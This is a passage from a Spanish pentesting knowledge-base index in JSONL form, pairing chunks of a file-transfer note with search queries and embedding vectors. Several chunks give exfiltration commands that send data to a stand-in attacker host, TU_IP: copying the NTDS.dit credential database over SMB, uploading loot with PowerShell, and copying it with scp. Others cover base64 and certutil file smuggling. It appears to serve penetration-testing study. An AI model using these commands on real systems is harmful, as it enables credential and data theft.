-0.00265, -0.0232, 0.07733, 0.06135, 0.04614, 0.01687, 0.11797, 0.02135, -0.08684, -0.01759, -0.00497, 0.08621, -0.10148, 0.01043, -0.00663, -0.09561, 0.03442, 0.02607, -0.00633, -0.0134, -0.00136, -0.01665, 0.06656, -0.04182, -0.03072, -0.00336, -0.01099, -0.00995, -0.01817, -0.04292, 0.01358, -0.04209, -0.03186, 0.02823, -0.03503, -0.05788, 0.05487, -0.01078, -0.05379, 0.04837, 0.07059, -0.07154, -0.02584, 0.00665, 0.08389, 0.00448, 0.02758, 0.02677, -0.01461, -0.05735, -0.07348, 0.02309, 0.05552, 0.04305, 0.00607, -0.01118, -0.01087, 0.07917, 0.05303, -0.02189, -0.10648, -0.03566, 0.02015, 0.01914, -0.00383, 0.02556, 0.01418, -0.00258, 0.00996, 0.02242, -0.00635, -0.03961, -0.01653, -0.00264, -0.07669, -0.08393, 0.05288, -0.00712, -0.13196, -0.07956, -0.0197, -0.02756, 0.00039, 0.00736, -0.03421, -0.04194, 0.00898, 0.02505, -0.00542, -0.03083, 0.05145]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Exfiltrar de la vΓ­ctima β†’ Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) β†’ secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "indexar": "con quΓ© herramienta puedo copiar archivos del sistema operativo a una direcciΓ³n IP remota?", "v": [0.08018, 0.00914, -0.13348, -0.21784, 0.08023, -0.23384, 0.05215, -0.01265, -0.10727, -0.00041, 0.01694, -0.16541, 0.12083, -0.07646, 0.08893, 0.00292, 0.14351, -0.05387, 0.00914, -0.14603, -0.09344, 0.05285, -0.0316, 0.00986, -0.07589, 0.04999, -0.00057, 0.06245, -0.17028, -0.10782, -0.07491, -0.02495, 0.11217, -0.04466, -0.18136, -0.0028, 0.00284, 0.10396, 0.02153, 0.02709, 0.01439, 0.07844, -0.11968, 0.07825, 0.09045, -0.02408, 0.0792, -0.07075, 0.00022, -0.05355, -0.10891, -0.21271, -0.09765, -0.05585, -0.04845, -0.06981, 0.18134, -0.09339, 0.02127, -0.03025, -0.07502, 0.08103, -0.10174, -0.03242, 0.0003, -0.08114, -0.0399, -0.06619, -0.10189, 0.0657, 0.02126, 0.05654, 0.04423, 0.0986, 0.01213, 0.02359, -0.00078, -0.02632, 0.01441, -0.01169, 0.04859, 0.00186, -0.09333, -0.01695, -0.04531, -0.17843, 0.05765, -0.04458, -0.04996, -0.0989, 0.01067, 0.00674, -0.0082, 0.04278, 0.03501, -0.02812, 0.03006, -0.01851, -0.05954, -0.03013, 0.00203, 0.00173, -0.11216, 0.12505, 0.01648, 0.03699, 0.05236, 0.02909, 0.00268, -0.05349, 0.0148, -0.00308, 0.00648, 0.00702, -0.0904, 0.03707, -0.04403, -0.05516, -0.01169, -0.00772, 0.00839, 0.07872, -0.05731, -0.02848, 0.05916, -0.01237, 0.00747, 0.15804, -0.00651, -0.06528, 0.04435, -2e-05, -0.05266, 0.03607, 0.00862, -0.01821, -0.04592, -0.06191, 0.00934, -0.05703, 0.01686, 0.00018, 0.00708, -0.06643, 0.09379, -0.03041, 0.06699, -0.11165, -0.02297, -0.09325, 0.0126, -0.02047, -0.03467, -0.03827, -0.06769, 0.06173, -0.0198, -0.07991, -0.04836, 0.00937, -0.04706, -0.01669, 0.00552, -0.00519, -0.02728, -0.04482, 0.00899, -0.0004, 0.09318, -0.00847, -0.03766, 0.05583, 0.03256, -0.05503, -0.02531, -0.04612, -0.00779, -0.03719, 0.01751, -0.0265, -0.06489, 0.03133, -0.01667, -0.01196, 0.05707, 0.01979, 0.04674, 0.06919, -0.01395, 0.03717, 0.04778, 0.03566, 0.0137, -0.02533, 0.00508, -0.02514, -0.03439, -0.04228, 0.03681, 0.02102, -0.0445, -0.03352, -0.00793, -0.05364, 0.04665, 0.0112, 0.01587, 0.03432, -0.00014, 0.01835, -0.00449, -0.03793, 0.06608, -0.05426, -0.06577, -0.00623, -0.0421, 0.02015, 0.01759, -0.03136, 0.04446, 0.01569, 0.07781, 0.04757, -0.01109, 0.03551, -0.00382, 0.02516, -0.02338, -0.04897, 0.0011, -0.01247, -0.02367, -0.0031, 0.04658, -0.06947, -0.01412, -0.02567, -0.0374, -0.00896, -0.01635, 0.0823, 0.02057, -0.04236, -0.071, -0.0369, -0.02712, 0.01476, -0.02255, -0.10223, -0.02861, 0.03136, 0.02834, -0.01729, 0.00108, 0.01291]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Exfiltrar de la vΓ­ctima β†’ Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) β†’ secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "indexar": "cΓ³mo exfiltrar datos de la vΓ­ctima usando SMB o SCP desde Kali?", "v": [-0.1946, -0.09255, -0.00696, -0.03838, -0.06513, -0.2814, -0.07067, -0.12413, -0.0338, 0.11481, -0.04802, -0.02039, 0.03341, -0.1191, -0.07367, 0.04073, -0.02177, -0.09547, -0.03766, -0.04646, 0.04473, -0.05147, 0.10844, -0.08073, -0.06667, 0.08371, 0.02263, 0.02556, -0.05565, -0.04664, 0.001, -0.0349, -0.03335, 0.02057, 0.08386, 0.02007, -0.09785, -0.04062, 0.05487, 0.02246, 0.14262, -0.03755, -0.08089, -0.05101, 0.1029, 0.00917, -0.11544, 0.03904, 0.044, 0.06512, -0.02897, 0.01376, -0.22581, -0.07435, -0.11794, -0.06502, 0.01007, -0.12599, 0.14235, 0.01795, -0.00317, 0.00174, 0.00312, 0.08772, 0.05195, -0.15355, 0.08877, 0.09228, -0.12376, 0.04087, 0.04079, 0.08282, -0.01687, -0.08743, 0.05998, -0.06336, 0.06422, 0.04994, 0.01314, 0.01793, -0.07758, -0.10116, -0.05798, 0.06042, -0.05358, 0.06069, 0.12606, -0.02101, -0.04479, -0.10378, 0.07912, 0.06114, 0.03077, 0.12096, 0.10046, -0.05861, -0.05556, -0.07223, 0.03995, 0.05504, 0.11795, 0.02253, -0.01217, 0.06496, 0.06916, -0.01751, 0.01726, 0.01888, -0.07637, -0.07989, -0.0442, 0.06867, -0.03817, -0.09448, -0.03068, -0.09347, 0.00305, -0.06525, 0.0332, 0.00897, 0.00951, -0.0008, 0.03964, -0.08113, -0.06814, -0.02196, -0.01577, -0.00523, 0.01875, -0.02205, -0.01273, 0.06265, 0.01831, 0.01789, 0.07736, -0.00999, -0.01413, -0.04226, -0.04883, -0.0782, 0.02422, 0.00854, -0.04331, 0.04915, -0.08283, -0.06293, 0.00631, 0.03501, -0.04702, -0.03066, 0.14326, -0.04035, -0.01751, 0.05409, -0.04753, 0.0288, -0.03641, -0.11845, -0.01627, 0.06045, -0.05416, -0.01567, -0.03933, 0.05602, 0.05393, -0.03502, 0.0637, -0.02637, 0.07084, -0.01608, 0.03914, 0.01988, 0.06869, -0.0452, 0.03202, -0.11094, 0.03259, -0.06071, -0.02303, 0.0079, 0.00595, 0.00943, -0.02665, 0.01095, -0.01268, -0.04902, 0.02324, -0.03435, 0.0142, -0.01679, -0.01389, 0.06785, 0.05701, 0.04027, 0.00121, -0.06612, -0.00943, 0.06354, 0.00827, -0.00687, -0.07886, 0.09071, -0.02782, -0.07554, 0.01971, 0.04873, -0.02654, -0.05753, 0.03329, -0.01135, 0.00213, 0.01439, 0.01047, -0.05199, -0.03019, -0.0188, 0.05602, -0.004, 0.03041, 0.05446, -0.06829, 0.00636, 0.04968, -0.00743, -0.07087, 0.00202, -0.04317, 0.04177, -0.02028, -0.00607, 0.01427, 0.0572, 0.01889, -0.03666, 0.08047, 0.0273, -0.0632, -0.01754, -0.03132, -0.03705, -0.00763, -0.01749, -0.05766, -0.02017, 0.00701, 0.01911, -0.04095, -0.00032, 0.02691, -0.03348, 0.0465, -0.02072, 0.03729, -0.07321, -0.05102, -0.06211]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "indexar": "que programa me sirve para pegar texto en base64", "v": [0.04142, 0.04401, -0.21325, -0.10849, -0.03547, -0.17368, -0.0153, -0.12814, 0.02568, -0.08357, 0.00464, 0.06709, -0.012, -0.0945, -0.00831, 0.05871, 0.00595, -0.06873, -0.00806, -0.05575, -0.01595, -0.03415, -0.00455, -0.12104, -0.03806, 0.02832, -0.05232, -0.14942, -0.09039, -0.02655, 0.04391, -0.01918, -0.06916, -0.09009, -0.11895, -0.04935, -0.06131, 0.02128, -0.04184, 0.01181, 0.0617, 0.10041, -0.1789, 0.19659, -0.04271, -0.04518, 0.09149, 0.0193, 0.05309, -0.07508, 0.0173, -0.09951, -0.12037, -0.04935, -0.12304, -0.12004, 0.04334, -0.0761, 0.00803, 0.08514, -0.03136, 0.02915, 0.07858, -0.06937, 0.04349, 0.00621, 0.07981, 0.05217, -0.0689, 0.02435, -0.07939, 0.15431, -0.08427, -0.0231, -0.00699, 0.07344, 0.01055, -0.06101, 0.01435, 0.04847, -0.03786, 0.0459, -0.04131, 0.06187, -0.02708, -0.00674, 0.05776, -0.04659, -0.00147, -0.04323, 0.16747, 0.01506, -0.01057, 0.0659, -0.01229, -0.07212, 0.0514, 0.02439, 0.04225, 0.08545, 0.03339, -0.13566, -0.02244, -0.03824, 0.02072, 0.01969, 0.109, -0.06465, -0.08407, 0.04993, -0.04468, 0.07819, -0.04262, 0.0448, 0.01192, -0.05632, -0.03951, 0.05878, 0.10525, -0.08363, -0.08217, 0.0839, -0.04233, 0.00801, 0.11362, -0.00631, 0.01275, 0.04534, -0.06168, 0.04422, -0.01306, 0.01532, -0.02735, 0.0378, -0.05999, 0.06277, 0.03589, -0.01482, -0.0276, -0.08316, 0.06634, 0.06999, -0.05155, 0.03578, 0.07856, 0.10386, 0.14108, -0.03769, -0.06756, -0.02699, 0.01409, -0.00844, 0.04418, 0.0123, -0.06416, -0.03944, 0.07762, 0.03275, -0.0575, 0.00825, -0.05968, -0.00121, -0.03053, 0.00746, -0.00482, -0.04262, -0.00393, -0.08389, 0.01947, 0.06282, -0.00852, 0.08276, 0.03146, -0.05639, -0.03057, -0.03225, -0.06706, -0.02039, 0.00069, 0.01724, -0.02386, 0.01882, 0.11485, 0.02681, 0.00115, -0.03033, -0.0633, 0.02337, -0.00903, -0.04546, 0.04448, -0.05355, -0.08703, -0.0099, -0.09151, -0.01819, -0.0155, 0.01943, 0.0383, -0.11133, -0.03785, 0.00883, -0.04191, 0.00963, 0.02172, 0.01973, 0.06406, -0.01467, -0.04753, 0.17256, -0.01748, -0.00228, 0.0168, 0.02472, -0.03417, 0.00263, 0.08066, 0.00582, 0.05045, -0.00308, 0.04598, -0.01759, -0.00142, 0.00681, 0.00028, 0.02101, 0.01049, 0.02193, 0.05236, -0.01854, -0.10083, -0.03646, -0.0873, 0.00962, -0.00948, -0.07561, -0.04419, 0.03979, -0.03566, -0.09289, 0.052, 0.03944, -0.06987, -0.07356, 0.01998, -0.0193, -0.08632, 0.04185, -0.00499, -0.00075, -0.04406, 0.03912, 0.08148, -0.0162, -0.00358, 0.02853]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "indexar": "con que puedo convertir un archivo binario a texto en base64", "v": [0.15131, -0.02257, -0.11136, -0.02177, -0.05543, -0.13711, -0.04787, -0.12734, -0.04829, -0.10985, 0.0148, -0.00957, 0.00222, -0.00047, -0.01173, -0.02608, 0.01974, -0.07473, -0.02211, -0.12852, 0.04786, -0.06104, 0.00069, -0.03472, 0.03942, -0.02727, -0.13777, -0.08201, -0.12874, 0.02388, 0.04247, -0.00392, 0.06512, 0.02979, -0.07977, -0.00303, -0.05826, 0.10571, -0.10061, 0.04494, 0.06246, 0.10798, -0.16806, 0.25793, -0.13967, -0.069, 0.02022, 0.02485, 0.03131, -0.09655, 0.04081, -0.12022, -0.13804, -0.04169, -0.09297, -0.18938, 0.13979, -0.11823, 0.02529, 0.04631, 0.0139, 0.06516, 0.09338, -0.01909, -0.05756, -0.00668, 0.00602, 0.12197, -0.13815, 0.0437, -0.12373, 0.18462, -0.06408, 0.05692, -0.01454, 0.06641, 0.01054, -0.08146, 0.00637, 0.05782, -0.00562, 0.02199, 0.00243, 0.04324, -0.04148, -0.02609, 0.00293, -0.02273, 0.04814, -0.06172, 0.14138, -0.0207, -0.01846, 0.03696, 0.0163, -0.05693, -0.02667, 0.00373, -0.00381, 0.05215, -0.01089, -0.0417, -0.00999, 0.00025, 0.10561, 0.05283, 0.06895, -0.03874, -0.04962, -0.00242, -0.00585, 0.0818, 0.04702, 0.03491, 0.0608, -0.03324, -0.06762, 0.05137, 0.07783, -0.05438, -0.07635, 0.04344, -0.03195, 0.01177, 0.08111, -0.05921, -0.0005, 0.03683, -0.0396, 0.0376, -0.02937, 0.03243, -0.07678, -0.0211, -0.05127, 0.11336, 0.07286, -0.04143, -0.03792, -0.06346, 0.05659, 0.04877, -0.06417, 0.02149, 0.09734, 0.08713, 0.07528, -0.06034, -0.07087, -0.08707, 0.02146, -0.01444, 0.0483, -0.01277, -0.07764, 0.0079, 0.07295, -0.05305, -0.01372, -0.00576, -0.03606, 0.06204, -0.04506, 0.00572, -0.03734, -0.02979, -0.02486, -0.08739, -0.04305, -0.05124, -0.01412, 0.03617, -0.00475, -0.05581, -0.02396, -0.06531, -0.11845, 0.00996, -0.00746, 0.01135, -0.00807, -0.02131, 0.08764, 0.01107, 0.01083, -0.0198, -0.01146, -0.01752, -0.01222, -0.02055, 0.03256, -0.02637, -0.09171, -0.02918, -0.04692, -0.01959, -0.03361, 0.03476, -0.00998, -0.07711, -0.00835, 0.01724, -0.03916, 0.02368, 0.02001, -0.01168, 0.00371, -0.03117, -0.06472, 0.0837, -0.02308, -0.02661, 0.02041, -0.0224, -0.05183, 0.02581, 0.05433, -0.01225, 0.03318, -0.02173, 0.05727, 0.00497, 0.02416, -0.02217, 0.00511, 0.04209, 0.00973, 0.05214, 0.00755, -0.00634, -0.08462, 0.01859, -0.07923, 0.03671, 0.02873, -0.0322, -0.04754, 0.03614, -0.04565, -0.06737, 0.06914, 0.04759, -0.06643, -0.03911, 0.0059, -0.01873, -0.09956, 0.05149, 0.01631, -0.0549, -0.0454, 0.03321, 0.09593, -0.01391, -0.02063, -0.01354]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "indexar": "cual es una herramienta sencilla para copiar y pegar cΓ³digo en base64 sin red", "v": [0.081, -0.01877, -0.15359, -0.07293, -0.04908, -0.28109, -0.00986, -0.00931, -0.00782, -0.10676, -0.04775, -0.06795, -0.03155, -0.11918, 0.06708, 0.02287, 0.01817, -0.08553, -0.04672, -0.05454, -0.0238, -0.01674, -0.04831, -0.08526, -0.01039, 0.06815, 0.0177, -0.06031, -0.14683, -0.00162, 0.04672, -0.01085, 0.01754, -0.00123, -0.19811, -0.01672, -0.01006, 0.04188, -0.06209, 0.00572, -0.02126, 0.11653, -0.18728, 0.17776, -0.07279, -0.01641, 0.05388, 0.0644, 0.05198, -0.00904, -0.0253, -0.15203, -0.1908, -0.12832, -0.08409, -0.18029, 0.15023, -0.0686, -0.00401, 0.05542, -0.02597, 0.01374, 0.02374, -0.01426, 0.02918, -0.04112, 0.05306, 0.0177, -0.09725, 0.0621, -0.01458, 0.16267, -0.12119, -0.00797, 0.04831, 0.05767, -0.00108, -0.1128, 0.00803, 0.08938, -0.01333, 0.01638, -0.04906, -0.01583, -0.01812, -0.08534, 0.06151, -0.06059, -0.02014, -0.07236, 0.14344, -0.00511, 0.01813, 0.0338, 0.00962, -0.05327, 0.03011, 0.04028, 0.00467, 0.01957, 0.04124, -0.10733, -0.04101, -0.01005, 0.0596, 0.0154, 0.09651, -0.0363, -0.06746, 0.00361, -0.03577, 0.02542, -0.02704, 0.04334, -0.00993, -0.05674, -0.04446, 0.02992, 0.02697, -0.08991, -0.02987, 0.06469, -0.10567, -0.02025, 0.0463, 0.0003, 0.00453, 0.06392, -0.04471, -0.10493, -0.04598, -0.00476, -0.02997, 0.07476, -0.02375, 0.08164, 0.00848, -0.08219, -0.02052, -0.09883, 0.03107, 0.04012, -0.06969, -0.02973, 0.06167, 0.13246, 0.12463, -0.04347, -0.11423, -0.00231, 0.00808, 0.00148, -0.01777, -0.0141, -0.0574, 0.05055, 0.02313, 0.03265, -0.05723, 0.01117, -0.06533, -0.01767, -0.0051, -0.00963, -0.02601, -0.05304, 0.03908, -0.05012, 0.02667, -0.00497, 0.03649, 0.05124, 0.00842, -0.05439, -0.02206, -0.1084, -0.0669, -0.02562, -0.01898, -0.04931, 0.01021, 0.05484, 0.07396, -0.0107, 0.02424, -0.05482, -0.02005, 0.04064, -0.02074, -0.02056, 0.05799, -0.03269, -0.03559, -0.02993, -0.03971, 0.01718, 0.0243, -0.00774, 0.01595, -0.07848, -0.03497, 0.02872, -0.06171, -0.03571, 0.02878, 0.01153, 0.03535, 0.00355, -0.08123, 0.11163, -0.03114, -0.00212, 0.02352, -0.00722, -0.03485, -0.00461, 0.0378, 0.01904, 0.03299, -0.04741, 0.06609, -0.0137, 0.01786, -0.00576, -0.02657, 0.0489, 0.01696, 0.04861, 0.01611, -0.01692, -0.05043, 6e-05, -0.05536, 0.02317, 0.02209, -0.04422, -0.00818, 0.05666, -0.05908, -0.05999, 0.04986, 0.03448, -0.05484, -0.04891, 0.00759, -0.02262, -0.063, 0.0115, -0.00716, -0.06256, -0.00806, 0.03831, 0.08743, -0.03221, -0.0225, -0.00627]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Windows: certutil -encode f.bin b64.txt / certutil -decode b64.txt f.bin\n```\nÚtil cuando solo tienes una shell de texto (Estabilizar shell TTY) o vΓ­a RDP `/clipboard`.", "indexar": "que programa hay para codificar y decodificar archivos con certificado en windows?", "v": [-0.02895, -0.10033, -0.11862, -0.09863, 0.0669, -0.18367, 0.03883, 0.02997, -0.08791, -0.14313, -0.03452, -0.14634, -0.20036, -0.10962, -0.0034, -0.02942, 0.13779, -0.14074, 0.0628, 0.0313, 0.03666, -0.04276, -0.04622, -0.06082, 0.07303, 0.01345, 0.03531, 0.04919, -0.09614, -0.01361, 0.12465, 0.04945, 0.10836, 0.01856, -0.07833, 0.0485, 0.0063, 0.00429, -0.08109, 0.10205, -0.04381, 0.02675, 0.05164, 0.0203, 0.05228, -0.10376, 0.07789, -0.02531, 0.11452, -0.05489, -0.02126, -0.09375, -0.0396, 0.08233, -0.03088, -0.03106, -0.12022, 0.01354, 0.00178, -0.00739, -0.00618, 0.03308, -0.06117, 0.0138, 0.05185, 0.07288, 0.12339, 0.08329, -0.06898, 0.11268, -0.05604, 0.00559, -0.00022, -0.04925, -0.01805, 0.04918, -0.12011, -0.16484, 0.08908, 0.00016, 0.06507, 0.04292, 0.02488, -0.03367, -0.04973, -0.09964, -0.04985, 0.03658, 0.01373, -0.02901, -0.01421, -0.03303, -0.02118, 0.06666, 0.08365, 0.00081, 0.08635, 0.03719, -0.01476, 0.0703, -0.02598, -0.07605, -0.0367, 0.07288, 0.05032, 0.12746, -0.0024, 0.04907, -0.02578, 0.03488, 0.02663, 0.01493, -0.09425, -0.01417, -0.11163, -0.02593, 0.00322, -0.10219, 0.06359, -0.0115, -0.11311, 0.04828, -0.0689, 0.03665, 0.04359, 0.05072, -0.005, 0.11955, -0.12178, 0.08459, 0.05104, -0.04221, -0.1007, -0.01364, -0.11987, -0.02876, 0.04458, -0.01273, -0.05099, -0.05089, 0.06058, 0.08464, 0.04651, 0.08323, 0.09986, 0.06993, -0.07849, -0.01175, -0.06121, -0.07567, -0.06351, 0.03152, -0.0531, 0.0445, -0.08872, -0.02068, 0.05777, 0.00848, -0.02017, 0.03437, -0.11417, -0.03043, -0.04619, 0.00798, -0.00419, -0.00247, 0.04585, 0.01139, 0.05668, -0.02126, 0.03698, 0.05309, 0.02205, -0.00721, 0.01577, 0.01148, 0.03358, -0.10692, -0.05861, -0.01526, -0.14366, 0.06577, 0.09193, -0.00162, 0.00989, 0.04441, -0.02263, 0.09658, 0.01873, 0.01486, -0.04682, -0.02739, -0.01956, 0.00716, -0.06151, -0.00536, -0.04457, -0.03421, -0.01011, -0.08431, -0.02456, -0.01081, 0.01013, 0.00738, 0.08675, 0.09939, 0.0054, -0.00108, 0.0927, 0.10507, 0.03247, -0.00654, 0.0457, 0.00902, -0.01685, -0.00266, -0.01209, 0.07624, 0.00738, 0.01191, 0.05308, -0.05131, 0.02657, 0.03034, -0.01547, -0.10543, -0.05244, 0.03599, 0.01795, 0.01186, -0.02775, -0.01933, -0.0261, 0.03108, 0.04289, 0.0168, 0.00118, -0.05033, -0.02636, -0.07548, -0.04758, 0.06952, -0.00631, -0.03344, -0.03449, 0.04163, -0.01665, -0.03246, 0.04272, 0.00209, -0.02057, -0.01245, -0.02994, -0.00373, 0.01345, 0.02492]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Windows: certutil -encode f.bin b64.txt / certutil -decode b64.txt f.bin\n```\nÚtil cuando solo tienes una shell de texto (Estabilizar shell TTY) o vΓ­a RDP `/clipboard`.", "indexar": "con que puedo convertir un archivo binario a base64 usando certutil?", "v": [0.13452, -0.02573, -0.15266, -0.00398, -0.0331, -0.15527, -0.04687, -0.09764, -0.06644, -0.11768, -0.01373, -0.0149, -0.03479, 0.02336, -0.01943, -0.06577, -0.01186, -0.1038, -0.02142, -0.12862, 0.06897, -0.04251, 0.0258, -0.05409, 0.02028, 0.03332, -0.10042, -0.06882, -0.1188, 0.01796, 0.09296, 0.01562, 0.07411, 0.04692, -0.07257, -0.02434, -0.07312, 0.08471, -0.10725, 0.06626, 0.05972, 0.07021, -0.18396, 0.24736, -0.08607, -0.05607, 0.00256, 0.00804, 0.02477, -0.09365, 0.01235, -0.1102, -0.15487, -0.03513, -0.03874, -0.20767, 0.09102, -0.09928, 0.05053, 0.00727, -0.01556, 0.03382, 0.11616, 0.02601, -0.04115, -0.03655, 0.02095, 0.12372, -0.14912, 0.01192, -0.11388, 0.17558, -0.05721, 0.04277, 0.03047, 0.05796, 0.05227, -0.07833, 0.03686, 0.03609, -0.00666, 0.01613, 0.03316, 0.03384, -0.07054, -0.02394, 0.00694, -0.03152, 0.04787, -0.08735, 0.1445, -0.02157, -0.03807, 0.01885, 0.05588, -0.04031, -0.00603, 0.02095, -0.00883, 0.0325, -0.00649, 0.00999, -0.03649, 0.00038, 0.09338, 0.05605, 0.11424, -0.05906, -0.04685, 0.02937, -0.01731, 0.1009, 0.04742, -0.00697, 0.06396, -0.02188, -0.07975, 0.00936, 0.04935, -0.03109, -0.06975, 0.0253, -0.03741, 0.01979, 0.05698, -0.06095, -0.02557, 0.05665, -0.03088, 0.02745, -0.02816, 0.0116, -0.06862, 0.01814, -0.06451, 0.10684, 0.07363, -0.09111, -0.06113, -0.04869, 0.08037, 0.06021, -0.04301, 0.02193, 0.12249, 0.09748, 0.03583, -0.06546, -0.08953, -0.07818, 0.01764, 0.00013, 0.04737, 0.01018, -0.10101, 0.01431, 0.06318, -0.09757, -0.01256, 0.01204, -0.0574, 0.055, -0.02731, 0.0172, -0.0539, -0.03647, -0.00115, -0.06494, -0.06029, -0.03631, 0.00925, 0.04224, -0.0131, -0.05855, 0.00262, -0.08195, -0.10503, -0.01202, 0.00993, -0.02194, -0.0067, -0.01863, 0.07992, 0.00074, 0.02164, -0.02075, -0.01998, -0.01586, 0.00758, 0.00236, 0.0535, -0.02672, -0.08, -0.01721, -0.04455, -0.01941, -0.02546, 0.01422, -0.02588, -0.08164, 0.00518, 0.03721, -0.03846, 0.01422, 0.03796, -0.01215, -0.00322, -0.00543, -0.04859, 0.07172, -0.02108, -0.0367, 0.02403, -0.02195, -0.06065, 0.02669, 0.03711, -0.00372, 0.00757, -0.04343, 0.05193, 0.01478, 0.00358, -0.01067, -5e-05, 0.05484, 0.02085, 0.0364, 0.01317, -0.01407, -0.07228, 0.05651, -0.08593, 0.01593, 0.04324, -0.03325, -0.03658, 0.03925, -0.03338, -0.08588, 0.0673, 0.05338, -0.07828, -0.03598, -0.01469, -0.02198, -0.08526, 0.02733, 0.01856, -0.05631, -0.04207, 0.04562, 0.08425, -0.02517, -0.03003, -0.00899]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Windows: certutil -encode f.bin b64.txt / certutil -decode b64.txt f.bin\n```\nÚtil cuando solo tienes una shell de texto (Estabilizar shell TTY) o vΓ­a RDP `/clipboard`.", "indexar": "cual es una alternativa libre a certutil para manejar comandos de codificacion?", "v": [0.00529, -0.03708, -0.0978, 0.00633, -0.01915, -0.15331, 0.03733, 0.05176, -0.24574, -0.05524, -0.10806, -0.14502, -0.00435, 0.02536, 0.03759, 0.03119, 0.21001, -0.08634, 0.08713, -0.03493, 0.07188, -0.09818, 0.0072, -0.09157, 0.03854, 0.03266, 0.11123, 0.01, -0.14764, -0.07706, 0.08028, 0.03787, 0.1564, 0.05004, -0.03339, 0.11643, 0.02598, 0.03792, -0.05619, 0.13932, -0.1007, -0.04442, -0.11861, 0.03469, 0.02803, -0.15254, 0.01613, 0.10468, 0.09775, -0.05913, 0.0072, -0.07464, -0.06987, 0.03745, 0.01223, -0.00489, 0.1495, -0.05232, -0.08367, -0.06517, -0.0389, -0.09212, -0.00081, 0.03286, -0.01559, -0.00293, 0.01873, -0.05849, -0.09599, 0.03578, -0.02782, 0.03481, -0.08988, 0.0074, 0.00302, 0.02729, -0.02667, -0.06784, 0.13988, 0.05886, 0.04345, 0.01447, -0.0447, 0.04641, -0.08235, -0.11009, -0.02681, -0.12982, -0.00371, -0.04229, 0.05104, -0.07512, -0.02566, 0.0324, 0.09017, 0.05107, 0.05699, 0.12925, 0.05017, 0.03366, -0.01233, 0.02744, -0.12738, 0.02059, 0.04975, 0.0106, 0.05413, -0.03215, 0.02677, 0.07122, -0.0107, -0.03605, -0.0253, -0.02081, 0.01263, -0.01385, -0.0448, -0.00078, -0.01112, -0.10154, -0.13451, -0.03049, 0.0003, -0.0078, 0.03522, 0.03723, 0.0276, 0.06436, 0.00687, 0.0247, -0.00033, -0.05444, -0.00407, -0.09345, -0.05031, 0.01738, 0.05071, -0.08482, -0.07713, 0.00846, -0.00753, 0.05233, -0.00139, 0.02177, 0.10271, 0.0173, -0.00908, -0.05175, -0.02528, -0.05574, -0.04654, 0.06308, -0.00084, 0.10495, -0.04948, -0.00184, -0.04403, -0.00231, -0.08378, 0.12083, -0.0474, -0.03895, -0.05674, 0.02227, -0.02001, -0.05373, 0.00329, -0.04176, -0.09413, -0.01114, -0.0065, 0.04725, 0.07714, -0.05452, 0.10265, -0.08735, -0.04468, -0.06567, -0.00737, -0.05119, 0.01405, 0.0296, -0.06227, -0.01596, 0.0316, -0.01273, -0.0073, 0.08118, -0.00781, 0.02574, 7e-05, 0.02936, -0.07472, -0.06575, -0.02147, -0.00567, 0.06242, -0.12742, -0.07236, -0.04404, -0.01094, 0.01927, 0.03695, -0.04775, 0.0224, 0.01101, 0.00857, 0.08294, 0.02933, 0.09255, 0.05451, 0.02681, 0.07469, 0.04297, -0.08296, -0.01826, -0.02917, 0.02893, -0.03976, -0.06905, 0.08378, 0.01014, 0.01106, -0.04675, -0.00079, -0.00358, -0.04807, 0.05716, -0.00786, 0.02787, 0.01644, 0.00913, -0.01751, 0.01741, 0.02538, 0.02076, -0.00247, 0.04648, 0.0349, -0.06597, 0.01842, 0.06238, -0.03262, -0.09214, -0.04625, -0.03514, -0.06767, -0.08005, -0.03991, -0.00691, -0.02675, -0.0021, -0.02223, -0.01803, 0.0049, -0.01684]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Cifrado (canal vigilado)\n```bash\nopenssl enc -base64 -in f -out f.b64 # ofuscar\nopenssl s_server -quiet -accept 